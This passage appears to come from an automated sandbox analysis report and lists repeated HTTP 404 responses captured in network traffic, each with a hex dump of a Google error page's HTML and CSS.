65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 30 Sep 2024 14:16:50 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 30 Sep 2024 14:16:51 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 30 Sep 2024 14:16:52 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 30 Sep 2024 14:16:53 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 30 Sep 2024 14:16:54 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 30 Sep 2024 14:16:55 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
